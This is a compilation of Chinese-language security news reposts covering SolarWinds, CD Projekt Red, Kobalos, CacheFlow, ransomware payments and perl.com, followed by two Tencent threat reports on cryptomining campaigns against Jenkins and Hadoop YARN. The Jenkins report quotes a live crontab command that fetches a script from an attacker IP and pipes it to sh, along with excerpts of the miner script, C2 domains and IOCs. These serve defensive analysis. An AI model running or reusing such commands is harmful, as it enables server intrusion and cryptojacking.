据外媒CNET报道，美众议院国土安全委员会和监督与改革委员会于当地时间周一宣布，他们将于本周就SolarWinds遭黑客攻击一事举行听证会。在2月26日的听证会上，SolarWinds CEO Sudhakar Ramakrishna、前SolarWinds CEO Kevin Thompson、微软总裁布拉德·史密斯和FireEye CEO Kevin Mandia都将出庭作证。 听证会将对私营公司在预防、调查和补救影响政府并对国家安全造成损害的网络攻击方面的作用展开调查。 此前，美情报机构曾在1月初将发生在去年的SolarWinds黑客事件归咎于俄罗斯。 据悉，该黑客攻击始于2020年3月左右，当时黑客侵入了总部位于德克萨斯州的SolarWinds的IT管理软件。黑客在SolarWinds的软件更新中植入了恶意代码，该公司约1.8万名私人和公共部门客户安装了受病毒感染的更新。 据报道，此次入侵包括美财政部高层使用的电子邮件系统。相关政府官员已经证实，美国财政部、能源部和商务部都遭遇了黑客入侵。据报道，此次黑客攻击的目标还波及到美国土安全部、五角大楼、国务院、国家卫生研究院和国家核安全局。 这场名为Weathering the Storm: The Role of Private Tech in the SolarWinds Breach and Ongoing Campaign的听证会将于美国东部时间2月26日上午9点开始。         （消息及封面来源：cnBeta）

据《华盛顿邮报》周二报道，SolarWinds黑客或已入侵美国宇航局（NASA）和美国联邦航空管理局（FAA）的网络，这是针对美国政府机构和私营公司的更广泛的间谍活动的一部分。这是在参议院情报委员会举行听证会前几个小时发生的，该委员会的任务是调查这次广泛的网络攻击。美国政府此前表示，这次攻击“很可能源自俄罗斯”。 NASA发言人没有对该报道提出异议，但以 “正在进行的调查”为由拒绝发表评论。FAA的发言人没有回应置评请求。 据悉，NASA和FAA是被证实受到攻击的9个政府机构中剩下的两个未命名的机构。其他七家包括商务部、能源部、国土安全部、司法部和国务院、财政部和国家卫生研究院，不过据信攻击者并没有入侵他们的机密网络。FireEye、微软和Malwarebytes等多家网络安全公司也在攻击中被攻破。 据报道，拜登政府正在准备对俄罗斯进行制裁，很大程度上是因为黑客攻击活动，《华盛顿邮报》也报道了这一消息。 去年，FireEye在自己的网络被攻破后，对黑客活动发出警报后，发现了这些攻击。每个受害者都是美国软件公司SolarWinds的客户，该公司的网络管理工具被联邦政府和财富500强企业广泛使用。黑客入侵SolarWinds的网络，在其软件中植入后门，并将后门与受污染的软件更新推送到客户网络中。 这不是唯一的入侵方式。据称，黑客还瞄准了其他公司，侵入受害者网络上的其他设备和电器，以及瞄准微软厂商，入侵其他客户的网络。 上周，上个月被提拔到白宫国家安全委员会，担任负责网络和新兴技术的副国家安全顾问的前国家安全局网络安全主管安妮·诺伊伯格表示，这次攻击花了 “几个月的时间来计划和执行”，“我们需要一些时间来逐层揭开这个真相”。         （消息及封面来源：cnBeta）

CD Projekt Red是一家电子游戏开发商，其代表作品是2020年争议巨大的电子游戏之一《赛博朋克2077》。那款游戏非常令人期待，但推出后却出现了巨大的问题，以至于变成了其开发商的累赘，并激怒了全球等待多年才能玩到这款游戏的玩家。该公司不久前宣布，黑客进入了其服务器，并窃取了网上泄露的游戏数据。 正如你所预料的那样，已经有一些用户通过Twitter和其他社交网络链接到这些被盗数据。据报道，CD Projekt Red一直在使用DMCA的移除请求来消除链接到该被盗数据的推文甚至账户。报道指出，上周四，至少有两名Twitter用户通过一家版权监测公司的电子邮件收到了DMCA移除请求的通知。 报道指出，邮件中列出了对侵权行为的描述，包括链接到非法获取源代码的《Gwent: The Witcher Card Game》的源代码，公司认为他说，该链接导致了一个便利的入口，让其他人下载源代码。 DMCA取缔通知的目标还有至少其他三个Twitter用户。他们的推文被一条标准的Twitter DMCA提示消息所取代，指出内容已被删除，以回应版权持有人的报告。CD Projekt Red上周宣布被黑客攻击，并发布了一张黑客要求的赎金截图。 游戏开发商拒绝与黑客合作，也没有支付赎金。据报道，黑客正试图出售他们在攻击中获得的其他数据。         （消息及封面来源：cnBeta）

2020年底，全球发生了一起重大网络攻击事件，横跨美国联邦部门、英国、欧洲议会等数千家机构受到影响。据悉，此次事件是由三大公司的供应链攻击引发的。SolarWinds，微软，和VMware， 攻击者能够借此访问大量私人文件和电子邮件。 这次攻击被微软称为 “Solorigate”，总裁布拉德·史密斯（Brad Smith）称其为 “清算时刻”。现在，该公司已经分享了Solorigate调查的最后进展。 微软公司安全、合规和身份认证副总裁Vasu Jakkal得出结论，虽然有国家背景的黑客能够破坏一些初始安全程序，但他们随后被 “统一的人类和数字保护团队”所阻止。她还澄清，公司没有发现客户数据或生产服务被入侵的证据。此外，调查证实，微软软件也没有被用来攻击其他主体。 微软表示，多种因素有助于限制此次攻击的范围，其他安全团队和组织也应该接受这些因素来推进工作。这些因素包括采用零信任安全模式，对凭证进行多因素认证，以及Azure Active Directory和Microsoft 365 Defender等云技术。最后，Jakkal强调，最重要的是公司和团队要共同加强集体防御。 微软安全响应中心(MSRC)接着表示。 虽然我们的内部调查已经结束，但这并不意味着事件会就此平息。这意味着我们依然要保持正常的 “零信任”安全态势，安全团队应该不断努力保护用户、设备和数据免受环境中持续存在的威胁。我们与网络安全社区的合作工作仍在继续，以保护我们免受持续的威胁，随着我们了解到更多的信息，我们将适当地分享学习和指导。 MSRC强调，即使攻击是在2020年12月发现的，各组织都在争分夺秒地减轻威胁，但它的分析显示，恶意行为者在2021年1月也依然在试图访问各类数据。微软已经澄清，在其所有服务中，攻击者只能够查看和下载Azure、Intune和Exchange的少量代码文件。被入侵的代码文件都不包含任何正在生产环境中使用的真实凭证。         （消息及封面来源：cnBeta）

去年 12 月，知名网络安全公司 Avast 在 Chrome 和 Edge 扩展商城上发现了 28 个含有恶意代码的扩展程序，有超过 300 万互联网用户受到影响。今天，Avast 进一步披露了该恶意代买 CacheFlow 的相关细节。所幸的是自 2020 年 12 月 18 日起，谷歌和微软均已将所有恶意扩展删除。 这些恶意扩展程序之所以能够躲避谷歌和微软严苛的安全审查，关键原因在于该恶意扩展会尝试使用分析请求的 Cache-Control HTTP 标头来隐藏其命令并控制秘密通道中的流量。Avast 认为这是一项新的技术。Avast 认为攻击者增加了 Google Analytics（分析）样式的流量不仅是为了隐藏恶意命令，而且扩展作者也对分析请求本身感兴趣。 Avast 认为攻击的步骤如下： 基于 Avast 的遥测数据，受影响最严重的三个国家和地区是巴西、乌克兰和法国。 这些恶意扩展程序伪装成工具，帮助用户下载 Facebook、Instagram 等社交媒体或 Vimeo、Spotify 等流媒体平台网站中的内容，但其中的恶意代码允许下载恶意程序来窃取用户敏感数据，重定向到广告和钓鱼网站。 Avast表示，这28个扩展包含可能执行一些恶意操作的代码，包括: ● 将用户流量重定向到广告 ● 将用户流量重定向到钓鱼网站 ● 收集个人数据，如出生日期、电子邮件地址和活动设备 ● 收集浏览历史 ● 擅自在用户设备上下载更多的恶意软件           （消息及封面来源：cnBeta）

一、概述 腾讯云防火墙捕获一黑客团伙利用Jenkins未授权访问漏洞针对云服务器的攻击，若攻击者利用漏洞攻击得手，就会通过CURL命令下载shell脚本执行，并继续通过脚本部署挖矿木马。腾讯云防火墙成功拦截了这些攻击，遭遇攻击的主机未受损失。 通过分析腾讯云防火墙拦截到的黑客攻击指令，发现攻击者在部署挖矿程序的过程中，会修改系统最大内存页，以达到系统资源的充分利用，并且会多次检测挖矿进程的状态，从而对挖矿程序进行保活操作。 因其该团伙使用的挖矿账名为syndarksonig@gmail.com，腾讯威胁情报中心将该挖矿木马命名为DarkMiner。根据该挖矿团伙使用的挖矿钱包算力估算，该团伙控制了约3000台服务器挖矿。 腾讯安全专家建议政企用户按照以下步骤自查是否遭遇类似攻击： 检查服务器是否部署Jenkins组件，如有部署，应继续检查是否配置复杂密码。配置弱密码的系统极易被入侵； 检查服务器是否访问矿池：142.44.242.100； 检查服务器是否存在恶意文件：/tmp/ .admin_thread，如有及时kill进程并删除相关文件。 腾讯安全响应清单 腾讯安全系列产品已针对DarkMiner黑产团伙进行升级响应，具体清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）DarkMiner团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）DarkMiner团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）已支持识别检测DarkMiner团伙关联的IOCs； 2）已支持检测和拦截Jenkins未授权命令执行漏洞利用攻击 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀DarkMiner团伙相关木马程序； 2）已支持检测Jenkins未授权命令执行漏洞； 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持识别检测DarkMiner团伙关联的IOCs； 2）已支持检测Jenkins未授权命令执行漏洞利用攻击； 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta   二、详细分析 Jenkins是一个知名的独立开源软件项目，是基于Java开发的一种持续集成工具，用于监控持续重复的工作，该项目提供了一个开放易用的软件平台，使软件的持续集成变成可能。如果用户在使用jenkins 时未设置帐号密码，或者使用了弱帐号密码，可能导致未授权访问攻击。 如果用户未设置密码，会导致系统存在Jakins存在未授权访问漏洞。 黑客在未授权的情况下访问jenkins系统，并通过系统管理中的“脚本命令行”功能执行了恶意脚本。 腾讯云防火墙捕获到黑客利用Jenkins未授权访问漏洞利用进行攻击的日志。 此次攻击执行恶意命令为： 'sh','-c','crontab -r; echo "* * * * * curl http[:]//37.49.230.155/manager.sh | sh; wget -O- http[:]//37.49.230.155/manager.sh | sh" | crontab -' 接着脚本manager.sh执行挖矿木马下载和启动。 首先根据CPU支持的线程数量设置最大内存页，以达到CPU资源利用最大化： SYSTEM_ADMIN_RENAME=".admin_thread"THREAD_COUNT=$(cat /proc/cpuinfo | grep model | grep name | wc -l) #sysctl -w vm.nr_hugepages=$THREAD_COUNT_MBbash -c "echo vm.nr_hugepages=$(($THREAD_COUNT * 1000)) >> /etc/sysctl.conf"#bash -c "echo vm.nr_hugepages=$THREAD_COUNT >> /etc/sysctl.conf" echo "Threads: $THREAD_COUNT, Threads in MB: $(($THREAD_COUNT * 1000))" sysctl -w vm.nr_hugepages=$(($THREAD_COUNT * 1000)) && echo "SET hugepage $(($THREAD_COUNT * 1000))" #|| \#sysctl -w vm.nr_hugepages=$THREAD_COUNT && echo "SET hugepage $THREAD_COUNT" for i in $(find /sys/devices/system/node/node* -maxdepth 0 -type d); do       echo 3 > "$i/hugepages/hugepages-1048576kB/nr_hugepages"; done echo "1GB pages successfully enabled" 然后通过cat /proc/cpuinfo命令获取CPU类型，并判断是否属于支持的类型。 进入TMP目录下，判断挖矿进程是否已经在运行中。 for path in $TMP_DIR do   >$path/.f && cd $path && rm .f done (ps -x | grep -e "$SYSTEM_ADMIN_RENAME" | grep -v grep) > /dev/null 2>&1 如果没有在运行中，则下载xmrig挖矿木马到/tmp/ .admin_thread，伪装成系统管理进程“System manager”，然后启动挖矿程序。 挖矿使用矿池：142.44.242.100:14444 钱包： 25WSQDugR4bMr9KTsyuiWQawTpaavoxF9pNujecKTpr5MKKUvUyPyL9ZMXq9woLwiVkzcJgkhF39NdENkmEREVLM2ZoqAB 根据该钱包的平均算力40KH/s推算，共有3000台左右服务器被攻陷并植入挖矿木马。 并且该木马会多次检测挖矿进程运行状态，发现失活就重复挖矿程序部署过程，使用多个旷工名连接矿池进行挖矿，其中挖矿子账号名均为syndarksonig@gmail.com。 DarkMiner团伙使用的旷工名 small big xm4868 jenkin jenkin xm14856 mac server xm18614 focal xm959 xm22649 macmac xm1600 xm29274 xmrig worker28467 xm13222 stak xm7381 xmrig29684   IOCs URL http[:]//37.49.230.155/bot.arm5 http[:]//37.49.230.155/system_manager.sh http[:]//37.49.230.155/ssh.sh http[:]//37.49.230.155/manager.sh http[:]//37.49.230.155/xmrig http[:]//37.49.230.155/xmrig1 http[:]//37.49.230.155/xmrig2 http[:]//37.49.230.155/xmrig3 http[:]//37.49.230.155/xmrig4 http[:]//37.49.230.155/xmrig5 MD5 manager.sh f8631ea3001a1ee82b6ba4b96cc6b26f 钱包： 425WSQDugR4bMr9KTsyuiWQawTpaavoxF9pNujecKTpr5MKKUvUyPyL9ZMXq9woLwiVkzcJgkhF39NdENkmEREVLM2ZoqAB

安全公司 ESET 近日放出了一则警告，提醒一款被挂有木马的 OpenSSH 软件，或被用于从 HPC 高性能计算集群中窃取 SSH 证书。这款 Linux 恶意软件被称作 Kobalos，安全研究人员称之“小而复杂”且“诡计多端”。即使攻击规模不大，但 Kobalos 后门还是渗透了一些主要目标，包括美国政府、欧洲大学、以及亚洲某些大型互联网服务提供商（ISP）的系统。 参考希腊神话中一个顽皮的小动物，ESET 研究人员将这款恶意软件命名为 Kobalos 。但除了 Linux、FreeBSD 和 Solaris，安全专家还发现了能够在 AIX、甚至 Windows 平台上运行的恶意软件变种的蛛丝马迹。 通过逆向工程可知，Kobalos 能够在互联网上扫描受害者。而且在大多数情况下，受害者主要集中在大型系统和超级计算机领域（另有涉及部分私有服务器设施），但目前尚未揪出相关事件的幕后黑手。 过去一年，互联网上曝光了多起涉及 HPC 集群的安全事件。比如 EGI CSIRT 调查发现有计算资源被利用于加密货币的挖矿，受害者包括波兰、加拿大等地的受感染服务器。 新闻中还提到过英国的 Archer 超级计算机（其 SSH 证书被盗），但目前尚不清楚黑客利用哪些恶意软件对其发起了怎样的攻击。 ESET 研究人员补充道，尽管 Kobalos 的代码库很是精简，但却包含了用于运行命令和远程服务器控制的代码。 为缓解攻击，安全公司建议用户为 SSH 服务器连接同时启用双因素身份验证。 最后，ESET 将其检测到的这款恶意软件正式命名为 Linux / Kobalos（或 Linux / Agent.IV）。 而用于 SSH 证书窃取的程序，则被称作 Linux / SSHDoor.EV、Linux / SSHDoor.FB、或 Linux / SSHDoor.FC 。           （消息来源：cnBeta；封面源自网络）

据外媒报道，虽然勒索软件仍是一个祸害，但现在也有一些好消息：受害者支付的平均金额在一年多的大幅增长后在Q4出现了下降。为什么呢？–因为越来越少的公司愿意屈服于赎金要求。来自网络安全公司Coveware公布的最新季度勒索软件报告显示，自2018年Q3以来，勒索软件的平均支付额持续上升，但在去年Q4下降34%，降至15.4108万美元。 与此同时，支付勒索软件费用的中位数也下降了55%，降至49,450美元。 一般来说，任何遭到勒索软件攻击的人都不被建议交出任何密码，因为这并不能保证作案者会交出加密密钥。似乎越来越多的公司开始听从这一建议。 该数据下滑的另一个原因则跟勒索软件攻击有关。犯罪分子威胁称，如果他们的要求得不到满足他们就会公布敏感信息。Coveware写道，这类攻击占Q4所有勒索软件攻击的70%，高于前一季度的50%。因为即使支付了赎金数据也会在网上泄露，所以很少有受害者会屈服于勒索。 在涉及数据被盗的案件中，只有60%的公司同意在Q4支付，低于第三季度的75%。 报告写道：“Coveware继续见证了被盗数据在付款后没有被删除或清除的迹象。此外，我们还看到一些组织在没有发生的情况下采取措施伪造数据外泄的样子。” 至于勒索软件的攻击载体，电子邮件钓鱼现在已经超过远程桌面协议(RDP)攻击成为最流行的网络攻击，其在Q4占比超过了50%。不过利用泄露的凭证的RDP仍非常流行，因为员工用户名和密码的勒索价低至50美元。 专业服务则是第二大最常见的勒索软件罪犯的目标行业–占比16.3%，仅次于医疗保健–占比17.9%。长期以来，医院和健康中心一直是犯罪分子认为他们更愿意掏钱的常见目标。随着疫情的蔓延，这些组织已经濒临崩溃的边缘，勒索软件的攻击则可能会造成生命的损失。             （消息及封面来源：cnBeta）

虽然近年来受欢迎程度逐渐下滑，但不少系统依然依赖 Perl 编程语言。上周末 Perl 基础架构博客 Perl NOC 报道称，Perl.com 官网被劫持，不再指向它原本应该指向的地方。它不再指向 Perl 相关的新闻网站，而被指向了一个停车网站。更严重的是，它被用于分发恶意软件。 需要说明的是，Perl编程语言的官方网站perl.org仍然安全完整。不幸的是，Perl.com 也被用作通过 CPAN 分发模块的镜像或备份。换句话说，劫持者有可能利用这种联系来危害使用 Perl 和 CPAN 的系统。目前官方已经在进行收回域名的工作，不过目前还没有估计何时能恢复正常。同时，我们强烈建议不要访问perl.com，并从CPAN设置中删除它。       （消息及封面来源：cnBeta）

一、概述 腾讯安全威胁情报中心检测到有攻击者利用Hadoop Yarn REST API未授权命令执行漏洞攻击云上主机，攻击成功后执行恶意命令，向系统植入挖矿木马、IRC BotNet后门、DDoS攻击木马，入侵成功后还会使用SSH爆破的方式进一步向目标网络横向扩散。 攻击者入侵成功后，会清理系统进程和文件，以清除其他资源占用较高的进程（可能是可疑挖矿木马，也可能是正常服务），以便最大化利用系统资源。入侵者同时会配置免密登录后门，以方便进行远程控制，入侵者安装的IRC后门、DDoS木马具备完整的目标扫描、下载恶意软件、执行任意命令和对特定目标进行网络攻击的能力。 通过对木马家族进行关联分析，发现本次攻击活动与永恒之蓝下载器木马关联度极高，攻击者使用的攻击套件与Outlaw僵尸网络木马高度一致，但尚不能肯定攻击活动由这两个团伙发起。 因本次攻击具有蠕虫式的扩散传播能力，可下载安装后门、执行任意命令，发起DDoS攻击，对受害单位网络信息系统安全构成严重影响。腾讯安全专家建议用户尽快修复Hadoop Yarn REST API未授权命令执行漏洞，避免采用弱口令，采用腾讯安全的技术方案检测系统，清除威胁。 Hadoop是一个由Apache基金会所开发的分布式系统基础架构，YARN是hadoop系统上的资源统一管理平台，其主要作用是实现集群资源的统一管理和调度，可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上，通过YARN来管理资源。 YARN提供有默认开放在8088和8090的REST API（默认前者）允许用户直接通过API进行相关的应用创建、任务提交执行等操作。在配置不当的情况下，REST API将会开放在公网，从而导致未授权访问的风险，黑客可利用该风险进行远程命令执行，实现对目标主机的完全控制。 自查处置建议 腾讯安全专家建议受影响的用户检查以下项目，清除木马，加固系统。 目录： /tmp/.W10-unix/.rsync/ 计划任务项: 11*/2** /a/upd>/dev/null 2>&1 58**0 /b/sync>/dev/null 2>&1 @reboot /b/sync>/dev/null 2>&1 00*/3** /c/aptitude>/dev/null 2>&1 加固： 1.如果Hadoop环境仅对内网提供服务，请不要将其服务开放到外网可访问。 2.如果必须开启公网访问，Hadoop在2.X以上版本提供了安全认证功能，建议管理员升级并启用Kerberos的认证功能，阻止未经授权的访问。 腾讯安全响应清单 腾讯安全全系列产品，可以在该团伙攻击的各个环节实施检测、防御。 腾讯安全产品应对本次威胁的详细响应清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）威胁情报已加入，可赋能全网安全设备。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）该Miner挖矿团伙相关情报已支持检索，可自动关联分析到该病毒家族最新变种，使用资产。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全防护 云防火墙 （Cloud  Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，阻断恶意攻击流量，阻断恶意通信流量： 1）Miner相关联的IOCs已支持识别检测； 2）Miner利用Hadoop Yarn REST API未授权漏洞发起的恶意攻击以支持识别检测，阻断； 3）支持检测SSH爆破攻击活动。 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec   主机安全 （Cloud  Workload Protection，CWP） 1）已支持Miner关联模块的检测告警、查杀清理； 2）支持检测SSH爆破攻击活动。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）Miner相关联的IOCs已支持识别检测； 2）Miner利用Hadoop Yarn REST API未授权漏洞发起的恶意攻击以支持识别检测； 3）支持对SSH爆破攻击活动进行检测。 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec 零信任无边界 访问控制系统 （iOA） 1）已支持Miner关联模块的检测告警、查杀清理。 零信任无边界访问控制系统（iOA）是腾讯结合自身丰富的网络安全管理实践经验与“零信任”理念，推出的网络边界访问管控整体解决方案。更多资料，可参考：https://s.tencent.com/product/ioa/index.html 二、详细分析 攻击者使用Hadoop命令执行入侵成功后执行恶意的经过BASE64编码的shell脚本，解码后可知，其目的是使用sftp从sshapi.netcatkit.com内下载dota3.tar.gz包，将其解压后执行目录内的initall文件和golan文件。 /tmp/.W10-unix/.rsync/initall /tmp/.W10-unix/.rsync/c/golan initall执行后则进一步对系统进程，文件进行清理，最终调用执行init2。 Intit2执行后则执行解压包内的多个文件，分别存放在a,b,c三个子文件夹。a目录下文件多层调用后执行挖矿程序；b目录多层调用后传播IRC BotNet后门木马，同时修改系统免密登录配置留下后门；c目录文件主要运行masscan做端口扫描，运行stsm（sshprank）进行暴力破解。 同时将3个目录下的主调度文件写入crontab启动项。 /.rsync/a/init0 主要功能为从文件、进程、网络对其它资源占用较高的程序进行清理，最终调用脚本执行wanwakuang的矿机文件。 /.rsync/a/a x86_64架构下执行挖矿wanwakuang，i686架构下执行anacron，但anacron模块并不存在，推测当前其挖矿平台覆盖度并不完善。 wanwakuang则为xmr矿机程序，进行门罗币挖矿。 /.rsync/b/a 进一步执行/.rsync/b/run程序。 /.rsync/b/run 该脚本主要包含两部分BASE64编码过的恶意命令，第一部分解码后为使用Perl编写的IRC BotNet木马，第二部分解码后主要为结束其它资源占用进程的shell命令，该文件同时会篡改authorized_keys文件进行免密登录后门配置。 解码后Perl编写的IRC BotNet 木马，该木马会对C2地址：api.netcatkit.com:443建立IRC连接，本地NICK，USER随机生成，管理员NICK为polly，molly。IRC连接成功后默认加入#007频道，木马具备基本的远程shell命令执行，文件下载，ddos网络攻击等功能。 指定目标进行Shell命令执行。 指定目标端口扫描，指定下载。 指定目标进行TCP，UDP，IGMP，ICMP类型流量攻击。 /.rsync/c/golan 调用masscan端口扫描工具和stsm暴力破解工具，对局域网内的开放的SSH服务进行暴破攻击，扫描时会首先获取本地SSH历史登录配置信息，通过直接攻击本地登录过的机器以提高其爆破成功率。 分析可知，该挖矿攻击代码结构，调度流程与Outlaw僵尸网络高度一致，下左图为本次捕获到的挖矿套件，右为Outlaw僵尸网络攻击套件。两者有着基本一致的包名，子模块名，脚本调度流程。不同之处为两者挖矿模块名字不同，挖矿模块存储方式分别为本地包内存储化和动态C2下载形式，同时两者使用到的扫描器有些许差异。 从其攻击方式和基础设施来看，更像是永恒之蓝家族投递，样本payload都使用netcatkit.com，sqlnetcat.com下的子域名进行托管，同时最终的包名，挖矿模块名有一致性。 下图为最近捕获的永恒之蓝下载器木马使用Hadoop Yarn REST API未授权命令执行攻击入侵，其payload托管地址为t.netcatkit.com/ln.core。 永恒之蓝payload其内当前注释掉的代码部分，下载链接包解压后执行initall：down.sqlnetcat.com/dota3.tar.gz（当前下载链接失效），dota3.tar.gz同样解压出名为的.rsync攻击套件。         IOCs MD5: 6eb76f7d81e899b29c03b8ee62d9acb3 be85068596881f3ebd6c0c76288c9415 10ea65f54f719bffcc0ae2cde450cb7a 4adb78770e06f8b257f77f555bf28065 eefc0ce93d254982fbbcd26460f3d10d be5771254df14479ad822ac0a150807a e46e8c74e2ae7d9bc2f286793fe2b6e2 c2531e3ee3b3ca43262ab638f9daa101 f093aae452fb4d8b72fe9db5f3ad559a c97485d5ba33291ed09b63286a7d124c 3570a54d6dace426e9e8520f302fe551 Domain： sshapi.sqlnetcat.com sshapi.netcatkit.com sshapi.ouler.cc api.netcatkit.com www.minpop.com t.netcatkit.com down.sqlnetcat.com URL： hxxp://www.minpop.com/sk12pack/names.php hxxp://www.minpop.com/sk12pack/idents.php